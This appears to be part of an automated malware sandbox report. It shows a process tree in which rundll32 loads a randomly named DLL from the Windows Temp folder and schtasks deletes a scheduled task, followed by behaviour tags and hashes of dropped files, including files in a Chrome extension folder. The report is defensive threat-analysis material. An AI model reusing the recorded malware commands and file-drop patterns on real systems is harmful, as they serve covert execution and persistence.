\??\c:\windows\system32\rundll32.EXEc:\windows\system32\rundll32.EXE "C:\Windows\Temp\xbydWIeeRqhITmFv\TqdcjKPe\pfFXBVn.dll",#1 /WjwmdidlMAe 3851321⤵PID:4852
-
C:\Windows\SysWOW64\rundll32.exec:\windows\system32\rundll32.EXE "C:\Windows\Temp\xbydWIeeRqhITmFv\TqdcjKPe\pfFXBVn.dll",#1 /WjwmdidlMAe 3851322⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:2864 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ZeToUwFKfeuZKVaZa"3⤵PID:3768
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
129B
MD5a526b9e7c716b3489d8cc062fbce4005
SHA12df502a944ff721241be20a9e449d2acd07e0312
SHA256e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066
SHA512d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88
-
Filesize
2KB
MD5100d6c8f5c96a0446b106e3c0fafdc73
SHA1438365709c18cceea8b136c411ca5a254c653377
SHA2567964221d97d223e67bbbdba5f7e22d948882736f0b3b782885381a8eba508e7c
SHA51203d4095b9c4ebbc70e702f5fe423c5aa272bd69f83145386d62ec09b48cba8968b3e2d0ae55e5440bae01f187bff2248151be2c5cddbb253b01edac2c7b9cf36
-
Filesize
2KB
MD578cb7f1b1d8a3e538f2ea52e33981c24
SHA1ad8030c083b777c848d941c26dfdcec03997d3dc
SHA25653f6e30bdcaf04b0c7bb93a3038b04ed98452596f26bf5d296abf207278a1ce1
SHA512786af68dfbd74a26be8fae6584f91b7198d812592396c449ae79571f937d3e4be21389da1767ce8eec2c515fbaaf0df1087ea8655fab6ca856e5556b88e5134a
-
Filesize
2KB
MD501bc3b3611d8d465436e0ef737a3751d
SHA1e83398c2d420b9c2a92e27e329fb5de74f66c247
SHA2563b6893d6fc7d7903922436a303ddca0b50da07ea21ea23afb7fccc91ac9f6715
SHA5129be0902841ccec46a1d79752ea8275a2f0387c00e9b1d45772771c30d6df9a3dd311ff1b6fd9b7d52f142b185fa2300c7e8039bfe8092024837c9812df82e4e7
-
Filesize
2KB
MD595ea9a18dccc3e935c2ed4bdfa1a6a4b
SHA1b7de9bc4cea96a5b9694f7888f1f36653498b7a1
SHA256da5cf58b04e36e35252c9485c40c4ce98d2d3074bad8c3ac1143597c0643da74
SHA512d893298ef49552a5056621d7571d6656222bd6b961748779d8617fe7f8994b6d1e29256b26a74e6f53e08c960455c58e61e7b2e431669c330cd550a4a7343a6f
-
Filesize
2.5MB
MD528e068017342c99b9dfe5542a3fe3f5e
SHA114eca861e12919cdd38b3b74d1932546e92e2b0d
SHA256369c797e10d46b7e7d9b96abd936b74e4745db3d8c35e313c47f9cd33f01a947
SHA5127dd8d1d2a140683712409acbed545858791019ca10750a2ad6cbd15269c9dfe4505db41382f3f28c8792d12eb2adbd711043d4827eda8f8520e9e2d4c0c80ddb
-
Filesize
2KB
MD5286d16173924926ccfa4a39ee5fdc85e
SHA1eddd5a18916a06952bcbeedd888a22e242f12890
SHA25664730efa451efbc89cfde35a9b9fc9c989e8664d17c729a6317bac3ebbd448a8
SHA5122de53139a3673e1da3d6280200c71a10ffa83dafe6929caf21059a6212a68e96e108c6c2d0607004789ff36c518baf1ed13a021baae7fe32311386fb0565863c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD59994940aba3e8149804d69c288ce45d8
SHA12ec3089377482108ae6f64f15a102671657bc0f8
SHA2568180ab19d6aec9a141816a88e55f4d725aabe39cce274864d0a2d0f66bedca9b
SHA5123e60c0d85ca604532b936784291d92cd756e9cf75115523378aed4ea6cd1fe51eaf3a6dcf3957c65e55628b3fd895b331e466ebd582c302f7f8b4fc7a38f4dc8
-
Filesize
30KB
MD532b06f8a59c5a08bd1e63dfc4704aeb9
SHA1fbc3d28a7dce35f3ae3ba103f69186b96983bf60
SHA256b97705bc72e575865fe050ecfc28d8095dbbff9f2300d15977b8f365dca30758
SHA51223f13536875a9350fa60cc5c266cdfdbcb25c2015f5aa19323b8c209d4bebd49746636cdc375d126b0eaa27142f13e5594cb73f7ff4eec103f278b0722061ba8
-
Filesize
12KB
MD513d4c758ce421cb6f28b9e6fae274df3
SHA16ab332054cad10650f5362479a97d79c4c359935
SHA2563055fee8e6b738ceb287dabd0674d7c4f1969c53a9a90103fcb922a9460a97d1
SHA512c2e22c7898169a7d4907b7bad4df1153ac3cf4f4701d8c229c36ed3f52f0ac9bba471b9135447f6ec45abd2f60d250403b38152a227152b6666e40a1c47bd3d9
-
Filesize
6.4MB
MD5c6d1a00fc94d1380122a8edec6bbf6fb
SHA16f19ab6d69a01a78fe0a39b394a5bc45ba65b468
SHA256cd7ae43e9754b1519737d7196ffca8b38439842e15b6cba51f2b5dc1128cf9db
SHA512a7c612beb21034de73e9241eb425e72aaa1e33c6a4daba4d505d0b8ea2a9f8721cf8eeec544ce07293e593dcfb073fa0b35d30abba152eb357e527ce0beb926e
-
Filesize
6.7MB
MD5f64d5f235616f5624ffffc005cea8502
SHA101ee73066960fe7522cc78bc3d958c45e5c0bc7c
SHA2565337ecc3e2e62b0b5ee022838303b43fd7989e91d0c1855d664f25e3c3e67de6
SHA5120f916061bdcbd5ead12280f3e3292de0ccbe67b7f01b6a6b1ef43fb15ce52e78ceade81ddb46bab80b571ef882e8a5427621b714bd6570279af9ea695e2d49fd
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
6KB
MD55c8c44d4a2f27c4f6570f08314c065e9
SHA1e0d891f86afcaef49a99eb6ba584c711fc7e58ff
SHA256d0563ae8346a1db2ecf6e6d597a9f8fca5cc08b88599bcf1c3548f25e6e32b40
SHA5128dc09cd4a580b5665b7660c3f20e4ee49889d12342b6070ce42bf9007a819b8c5d0ebf4a6e575c7c5d913283db4172a963cbd1627e80efc091def8faac065be8
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize1KB
MD50f5cbdca905beb13bebdcf43fb0716bd
SHA19e136131389fde83297267faf6c651d420671b3f
SHA256a99135d86804f5cf8aaeb5943c1929bd1458652a3318ab8c01aee22bb4991060
SHA512a41d2939473cffcb6beb8b58b499441d16da8bcc22972d53b8b699b82a7dc7be0db39bcd2486edd136294eb3f1c97ddd27b2a9ff45b831579cba6896d1f776b0
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize12KB
MD5cd4565cb498ce71a26cf7dc0cbb6600a
SHA119e0ae8233bcb777d02f804ee8de54dcde429fa9
SHA256ad24d6daabadd9c6f2d8bcb7f74e05c5c304722eb8a09cf1581e4d6b358ff1b7
SHA512ebf3329e9f35183ff7187ada7ebe56f6b3b81acafa2fbf711a872238f75a0ed81e3189d9e13e6fabdafe25bedb1469a03cd43cd2acb9db426fbc23fec653d2aa
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize12KB
MD54e3685c152aebad49e8263ed44da9b38
SHA16b63c1c80fc2c2587894fecdfd4bae36b30e41c0
SHA256912ea9befd45096ba78bf2f5497b3e838cdd67cea101b662497f15003ad7d380
SHA51248b699fcd3913a3a43bc26225439267d0558ea83fb19b3308ec99e0018fa2401949b3826dc33a35fbe91ef076f661363e972f7d83e61fe049f4c56346edfabf7
-
Filesize
6.4MB
MD55d740b320c775324f8e393faec617d9f
SHA121a9e9f5dd931fb6f0d1e43060cee615cfb96234
SHA2563535c6701e6e2aa8e8e378ed34e5a7379f3bc4d87aed35a9220f30daaf88c06c
SHA5123be68a8651a89a562d79bd77fc2507ea88ff390ffee82318ed25f49ef00593d584244a8a0705ea56f624bb4474b826d556e009fb3660ee184dee5303c478c03f
-
Filesize
6KB
MD5bbdd59560243b3f4c52093655114492d
SHA144ccb5f4dd0e47150957b774d53addd20a5396b2
SHA256540eb228a3aff6f185bcb3ea003f97b48be84792ee64ecb26e9f1c67a5f10b9a
SHA512838b89ac8e53efa8d2ebd53ee5ab07e4d4b6ecdb5c02d77cc4943977a5055f46c0c8d262d4d70727e96e717bd3a0bef1bab7957ae1a2b5a1e0ac13f67da2d732